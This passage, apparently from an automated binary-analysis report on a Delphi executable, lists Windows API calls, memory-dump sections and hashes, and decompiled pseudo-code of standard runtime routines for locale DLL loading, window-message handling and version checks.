                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                        • RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                        • RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1759228003-2375825460
                                                                        • Opcode ID: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction ID: 04e7f70bc9d5a93712b3d4866678576dafef9722c20d67039ec14452820f7b6a
                                                                        • Opcode Fuzzy Hash: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction Fuzzy Hash: D2516D71A4060C7AFB21D6A4CC46FEFBAACDB04744F5041B7BA44F65C1E6789E448FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00455880(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                                        				struct HWND__* _v8;
                                                                        				struct HWND__* _v12;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t161;
                                                                        				struct HWND__* _t162;
                                                                        				struct HWND__* _t163;
                                                                        				void* _t166;
                                                                        				struct HWND__* _t176;
                                                                        				struct HWND__* _t185;
                                                                        				struct HWND__* _t188;
                                                                        				struct HWND__* _t189;
                                                                        				struct HWND__* _t191;
                                                                        				struct HWND__* _t197;
                                                                        				struct HWND__* _t199;
                                                                        				struct HWND__* _t202;
                                                                        				struct HWND__* _t205;
                                                                        				struct HWND__* _t206;
                                                                        				struct HWND__* _t216;
                                                                        				struct HWND__* _t217;
                                                                        				struct HWND__* _t222;
                                                                        				struct HWND__* _t224;
                                                                        				struct HWND__* _t227;
                                                                        				struct HWND__* _t231;
                                                                        				struct HWND__* _t245;
                                                                        				struct HWND__* _t249;
                                                                        				struct HWND__* _t251;
                                                                        				struct HWND__* _t252;
                                                                        				struct HWND__* _t264;
                                                                        				intOrPtr _t267;
                                                                        				struct HWND__* _t270;
                                                                        				intOrPtr* _t271;
                                                                        				struct HWND__* _t279;
                                                                        				struct HWND__* _t281;
                                                                        				struct HWND__* _t292;
                                                                        				void* _t301;
                                                                        				signed int _t303;
                                                                        				struct HWND__* _t309;
                                                                        				struct HWND__* _t310;
                                                                        				struct HWND__* _t311;
                                                                        				void* _t312;
                                                                        				intOrPtr _t335;
                                                                        				struct HWND__* _t339;
                                                                        				intOrPtr _t361;
                                                                        				void* _t365;
                                                                        				struct HWND__* _t370;
                                                                        				void* _t371;
                                                                        				void* _t372;
                                                                        				intOrPtr _t373;
                                                                        
                                                                        				_t312 = __ecx;
                                                                        				_push(_t365);
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t372);
                                                                        				_push(0x455f10);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t373;
                                                                        				 *(_v12 + 0xc) = 0;
                                                                        				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                                                        				if(_t301 < 0) {
                                                                        					L5:
                                                                        					E00455734(_v8, _t312, _v12);
                                                                        					_t303 =  *_v12;
                                                                        					_t161 = _t303;
                                                                        					__eflags = _t161 - 0x53;
                                                                        					if(__eflags > 0) {
                                                                        						__eflags = _t161 - 0xb017;
                                                                        						if(__eflags > 0) {
                                                                        							__eflags = _t161 - 0xb020;
                                                                        							if(__eflags > 0) {
                                                                        								_t162 = _t161 - 0xb031;
                                                                        								__eflags = _t162;
                                                                        								if(_t162 == 0) {
                                                                        									_t163 = _v12;
                                                                        									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                                                        									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                                                        										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                                                        									} else {
                                                                        										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                                                        									}
                                                                        									L99:
                                                                        									_t166 = 0;
                                                                        									_pop(_t335);
                                                                        									 *[fs:eax] = _t335;
                                                                        									goto L100;
                                                                        								}
                                                                        								__eflags = _t162 + 0xfffffff2 - 2;
                                                                        								if(_t162 + 0xfffffff2 - 2 < 0) {
                                                                        									 *(_v12 + 0xc) = E004577D8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
                                                                        								} else {
                                                                        									L98:
                                                                        									E004557F8(_t372); // executed
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							if(__eflags == 0) {
                                                                        								_t176 = _v12;
                                                                        								__eflags =  *(_t176 + 4);
                                                                        								if( *(_t176 + 4) != 0) {
                                                                        									E0045647C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                        								} else {
                                                                        									E00456420(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							_t185 = _t161 - 0xb01a;
                                                                        							__eflags = _t185;
                                                                        							if(_t185 == 0) {
                                                                        								_t188 = IsIconic( *(_v8 + 0x30));
                                                                        								__eflags = _t188;
                                                                        								if(_t188 == 0) {
                                                                        									_t189 = GetFocus();
                                                                        									_t339 = _v8;
                                                                        									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
                                                                        									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
                                                                        										_t191 = E0044D7A0(0);
                                                                        										__eflags = _t191;
                                                                        										if(_t191 != 0) {
                                                                        											SetFocus(_t191);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							__eflags = _t185 == 5;
                                                                        							if(_t185 == 5) {
                                                                        								L88:
                                                                        								E00456960(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                                                        								goto L99;
                                                                        							} else {
                                                                        								goto L98;
                                                                        							}
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							_t197 =  *(_v8 + 0x44);
                                                                        							__eflags = _t197;
                                                                        							if(_t197 != 0) {
                                                                        								_t367 = _t197;
                                                                        								_t199 = E0043CC2C(_t197);
                                                                        								__eflags = _t199;
                                                                        								if(_t199 != 0) {
                                                                        									_t202 = IsWindowEnabled(E0043CC2C(_t367));
                                                                        									__eflags = _t202;
                                                                        									if(_t202 != 0) {
                                                                        										_t205 = IsWindowVisible(E0043CC2C(_t367));
                                                                        										__eflags = _t205;
                                                                        										if(_t205 != 0) {
                                                                        											 *0x47aaf4 = 0;
                                                                        											_t206 = GetFocus();
                                                                        											SetFocus(E0043CC2C(_t367));
                                                                        											E00437760(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                                                        											SetFocus(_t206);
                                                                        											 *0x47aaf4 = 1;
                                                                        											 *(_v12 + 0xc) = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L99;
                                                                        						}
                                                                        						__eflags = _t161 - 0xb000;
                                                                        						if(__eflags > 0) {
                                                                        							_t216 = _t161 - 0xb001;
                                                                        							__eflags = _t216;
                                                                        							if(_t216 == 0) {
                                                                        								_t217 = _v8;
                                                                        								__eflags =  *((short*)(_t217 + 0xf2));
                                                                        								if( *((short*)(_t217 + 0xf2)) != 0) {
                                                                        									 *((intOrPtr*)(_v8 + 0xf0))();
                                                                        								}
                                                                        								goto L99;
                                                                        							}
                                                                        							__eflags = _t216 == 0x15;
                                                                        							if(_t216 == 0x15) {
                                                                        								_t222 = E004562F8(_v8, _t312, _v12);
                                                                        								__eflags = _t222;
                                                                        								if(_t222 != 0) {
                                                                        									 *(_v12 + 0xc) = 1;
                                                                        								}
                                                                        								goto L99;
                                                                        							} else {
                                                                        								goto L98;
                                                                        							}
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							_t224 = _v8;
                                                                        							__eflags =  *((short*)(_t224 + 0xfa));
                                                                        							if( *((short*)(_t224 + 0xfa)) != 0) {
                                                                        								 *((intOrPtr*)(_v8 + 0xf8))();
                                                                        							}
                                                                        							goto L99;
                                                                        						}
                                                                        						_t227 = _t161 - 0x112;
                                                                        						__eflags = _t227;
                                                                        						if(_t227 == 0) {
                                                                        							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                                                        							__eflags = _t231;
                                                                        							if(_t231 == 0) {
                                                                        								E00455F74(_v8);
                                                                        							} else {
                                                                        								__eflags = _t231 == 0x100;
                                                                        								if(_t231 == 0x100) {
                                                                        									E00456024(_v8);
                                                                        								} else {
                                                                        									E004557F8(_t372);
                                                                        								}
                                                                        							}
                                                                        							goto L99;
                                                                        						}
                                                                        						__eflags = _t227 + 0xffffffe0 - 7;
                                                                        						if(_t227 + 0xffffffe0 - 7 < 0) {
                                                                        							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                                                        							goto L99;
                                                                        						} else {
                                                                        							goto L98;
                                                                        						}
                                                                        					}
                                                                        					if(__eflags == 0) {
                                                                        						goto L88;
                                                                        					}
                                                                        					__eflags = _t161 - 0x16;
                                                                        					if(__eflags > 0) {
                                                                        						__eflags = _t161 - 0x1d;
                                                                        						if(__eflags > 0) {
                                                                        							_t245 = _t161 - 0x37;
                                                                        							__eflags = _t245;
                                                                        							if(_t245 == 0) {
                                                                        								 *(_v12 + 0xc) = E00455F58(_v8);
                                                                        								goto L99;
                                                                        							}
                                                                        							__eflags = _t245 == 0x13;
                                                                        							if(_t245 == 0x13) {
                                                                        								_t249 = _v12;
                                                                        								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
                                                                        								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
                                                                        									_t251 = _v8;
                                                                        									__eflags =  *((char*)(_t251 + 0x9e));
                                                                        									if( *((char*)(_t251 + 0x9e)) != 0) {
                                                                        										_t252 = _v8;
                                                                        										__eflags =  *(_t252 + 0xa0);
                                                                        										if( *(_t252 + 0xa0) != 0) {
                                                                        											 *(_v12 + 0xc) = 0;
                                                                        										} else {
                                                                        											_t309 = E0040BBC8("vcltest3.dll", _t303, 0x8000);
                                                                        											 *(_v8 + 0xa0) = _t309;
                                                                        											__eflags = _t309;
                                                                        											if(_t309 == 0) {
                                                                        												 *(_v12 + 0xc) = GetLastError();
                                                                        												 *(_v8 + 0xa0) = 0;
                                                                        											} else {
                                                                        												 *(_v12 + 0xc) = 0;
                                                                        												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                                                        												_t310 = _t370;
                                                                        												__eflags = _t370;
                                                                        												if(_t370 != 0) {
                                                                        													_t264 =  *(_v12 + 8);
                                                                        													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L99;
                                                                        							} else {
                                                                        								goto L98;
                                                                        							}
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							_t267 =  *0x496c08; // 0x215094c
                                                                        							E00454D9C(_t267);
                                                                        							E004557F8(_t372);
                                                                        							goto L99;
                                                                        						}
                                                                        						_t270 = _t161 - 0x1a;
                                                                        						__eflags = _t270;
                                                                        						if(_t270 == 0) {
                                                                        							_t271 =  *0x495bf8; // 0x496b6c
                                                                        							E00441478( *_t271, _t312,  *(_v12 + 4));
                                                                        							E0045578C(_v8, _t303, _t312, _v12, _t365);
                                                                        							E004557F8(_t372);
                                                                        							goto L99;
                                                                        						}
                                                                        						__eflags = _t270 == 2;
                                                                        						if(_t270 == 2) {
                                                                        							E004557F8(_t372);
                                                                        							_t279 = _v12;
                                                                        							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
                                                                        							asm("sbb eax, eax");
                                                                        							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
                                                                        							_t281 = _v12;
                                                                        							__eflags =  *(_t281 + 4);
                                                                        							if( *(_t281 + 4) == 0) {
                                                                        								E00455688();
                                                                        								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                                                        							} else {
                                                                        								E00455698(_v8);
                                                                        								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                                                        							}
                                                                        							goto L99;
                                                                        						} else {
                                                                        							goto L98;
                                                                        						}
                                                                        					}
                                                                        					if(__eflags == 0) {
                                                                        						_t292 = _v12;
                                                                        						__eflags =  *(_t292 + 4);
                                                                        						if( *(_t292 + 4) != 0) {
                                                                        							 *((char*)(_v8 + 0x9c)) = 1;
                                                                        						}
                                                                        						goto L99;
                                                                        					}
                                                                        					__eflags = _t161 - 0x14;
                                                                        					if(_t161 > 0x14) {
                                                                        						goto L98;
                                                                        					}
                                                                        					switch( *((intOrPtr*)(_t161 * 4 +  &M00455924))) {
                                                                        						case 0:
                                                                        							__eax = E0041C0B0();
                                                                        							goto L99;
                                                                        						case 1:
                                                                        							goto L98;
                                                                        						case 2:
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_push(0xb01a);
                                                                        							_v8 =  *(_v8 + 0x30);
                                                                        							_push( *(_v8 + 0x30));
                                                                        							L004070E4();
                                                                        							__eax = E004557F8(__ebp);
                                                                        							goto L99;
                                                                        						case 3:
                                                                        							__eax = _v12;
                                                                        							__eflags =  *(__eax + 4);
                                                                        							if( *(__eax + 4) == 0) {
                                                                        								__eax = E004557F8(__ebp);
                                                                        								__eax = _v8;
                                                                        								__eflags =  *(__eax + 0xac);
                                                                        								if( *(__eax + 0xac) == 0) {
                                                                        									__eax = _v8;
                                                                        									__eax =  *(_v8 + 0x30);
                                                                        									__eax = E0044D650( *(_v8 + 0x30), __ebx, __edi, __esi);
                                                                        									__edx = _v8;
                                                                        									 *(_v8 + 0xac) = __eax;
                                                                        								}
                                                                        								_v8 = L00455690();
                                                                        							} else {
                                                                        								_v8 = E00455698(_v8);
                                                                        								__eax = _v8;
                                                                        								__eax =  *(_v8 + 0xac);
                                                                        								__eflags = __eax;
                                                                        								if(__eax != 0) {
                                                                        									__eax = _v8;
                                                                        									__edx = 0;
                                                                        									__eflags = 0;
                                                                        									 *(_v8 + 0xac) = 0;
                                                                        								}
                                                                        								__eax = E004557F8(__ebp);
                                                                        							}
                                                                        							goto L99;
                                                                        						case 4:
                                                                        							__eax = _v8;
                                                                        							__eax =  *(_v8 + 0x30);
                                                                        							_push(__eax);
                                                                        							L00407044();
                                                                        							__eflags = __eax;
                                                                        							if(__eax == 0) {
                                                                        								__eax = E004557F8(__ebp);
                                                                        							} else {
                                                                        								__eax = E00455834(__ebp);
                                                                        							}
                                                                        							goto L99;
                                                                        						case 5:
                                                                        							__eax = _v8;
                                                                        							__eax =  *(_v8 + 0x44);
                                                                        							__eflags = __eax;
                                                                        							if(__eax != 0) {
                                                                        								__eax = E00453004(__eax, __ecx);
                                                                        							}
                                                                        							goto L99;
                                                                        						case 6:
                                                                        							__eax = _v12;
                                                                        							 *_v12 = 0x27;
                                                                        							__eax = E004557F8(__ebp);
                                                                        							goto L99;
                                                                        					}
                                                                        				} else {
                                                                        					_t311 = _t301 + 1;
                                                                        					_t371 = 0;
                                                                        					L2:
                                                                        					L2:
                                                                        					if( *((intOrPtr*)(E00414208( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						_t166 = 0;
                                                                        						_pop(_t361);
                                                                        						 *[fs:eax] = _t361;
                                                                        					}
                                                                        					L100:
                                                                        					return _t166;
                                                                        					L4:
                                                                        					_t371 = _t371 + 1;
                                                                        					_t311 = _t311 - 1;
                                                                        					__eflags = _t311;
                                                                        					if(_t311 != 0) {
                                                                        						goto L2;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RegisterAutomation$lkI$vcltest3.dll
                                                                        • API String ID: 0-607161752
                                                                        • Opcode ID: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction ID: f2d9504c2ba57309c7552e980363ea0a8989d55f74f96697af3e275cc6580183
                                                                        • Opcode Fuzzy Hash: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction Fuzzy Hash: D9E1AD31A00A05DFDB10DB69C595A6EB7F1AF08311F2881A6FD059B363D738EE49DB09
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E00405DAC() {
                                                                        				void* _t28;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				struct HINSTANCE__* _t42;
                                                                        				char* _t51;
                                                                        				void* _t52;
                                                                        				struct HINSTANCE__* _t59;
                                                                        				void* _t61;
                                                                        
                                                                        				_push(0x105);
                                                                        				_push( *((intOrPtr*)(_t61 - 4)));
                                                                        				_push(_t61 - 0x11d);
                                                                        				L00401338();
                                                                        				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                                        				_t59 = 0;
                                                                        				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                                        					L14:
                                                                        					return _t59;
                                                                        				} else {
                                                                        					_t28 = _t61 - 0x11d;
                                                                        					_push(_t28);
                                                                        					L00401340();
                                                                        					_t51 = _t28 + _t61 - 0x11d;
                                                                        					L5:
                                                                        					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                                        						_t51 = _t51 - 1;
                                                                        						goto L5;
                                                                        					}
                                                                        					_t30 = _t61 - 0x11d;
                                                                        					if(_t51 != _t30) {
                                                                        						_t52 = _t51 + 1;
                                                                        						if( *((char*)(_t61 - 0x12)) != 0) {
                                                                        							_push(0x105 - _t52 - _t30);
                                                                        							_push(_t61 - 0x12);
                                                                        							_push(_t52);
                                                                        							L00401338();
                                                                        							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                                        						}
                                                                        						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                                        							_push(0x105 - _t52 - _t61 - 0x11d);
                                                                        							_push(_t61 - 0xd);
                                                                        							_push(_t52);
                                                                        							L00401338();
                                                                        							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                        							_t59 = _t36;
                                                                        							if(_t59 == 0) {
                                                                        								 *((char*)(_t61 - 0xb)) = 0;
                                                                        								_push(0x105 - _t52 - _t61 - 0x11d);
                                                                        								_push(_t61 - 0xd);
                                                                        								_push(_t52);
                                                                        								L00401338();
                                                                        								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                        								_t59 = _t42;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L14;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1599918012-2375825460
                                                                        • Opcode ID: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction ID: a95c978ba0d7d151ab845f00ccb1e953877a4a526e1e70593208f9c5fde5a4dc
                                                                        • Opcode Fuzzy Hash: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
                                                                        • Instruction Fuzzy Hash: 6F318F71E0061C6AFB25D6B8DC46BDF6AAC8B04344F4401F7AA44F61C1E6789F848F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00441B28(void* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t8;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				intOrPtr _t20;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr _t28;
                                                                        
                                                                        				_t25 = __esi;
                                                                        				_t17 = __ecx;
                                                                        				_push(_t28);
                                                                        				_push(0x441bae);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t28;
                                                                        				 *0x496b74 =  *0x496b74 - 1;
                                                                        				if( *0x496b74 < 0) {
                                                                        					 *0x496b70 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                                        					_t31 =  *0x496b70;
                                                                        					E004418D8(_t16, __edi,  *0x496b70);
                                                                        					_t6 =  *0x431d0c; // 0x431d58
                                                                        					E00413838(_t6, _t16, _t17,  *0x496b70);
                                                                        					_t8 =  *0x431d0c; // 0x431d58
                                                                        					E004138D8(_t8, _t16, _t17, _t31);
                                                                        					_t21 =  *0x431d0c; // 0x431d58
                                                                        					_t10 =  *0x443240; // 0x44328c
                                                                        					E00413884(_t10, _t16, _t21, __esi, _t31);
                                                                        					_t22 =  *0x431d0c; // 0x431d58
                                                                        					_t12 =  *0x441bb8; // 0x441c04
                                                                        					E00413884(_t12, _t16, _t22, __esi, _t31);
                                                                        					_t23 =  *0x431d0c; // 0x431d58
                                                                        					_t14 =  *0x441d6c; // 0x441db8
                                                                        					E00413884(_t14, _t16, _t23, _t25, _t31);
                                                                        				}
                                                                        				_pop(_t20);
                                                                        				 *[fs:eax] = _t20;
                                                                        				_push(0x441bb5);
                                                                        				return 0;
                                                                        			}
















                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,00441BAE), ref: 00441B42
                                                                          • Part of subcall function 004418D8: GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                          • Part of subcall function 004418D8: GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                          • Part of subcall function 004418D8: RegisterClipboardFormatA.USER32 ref: 00441993
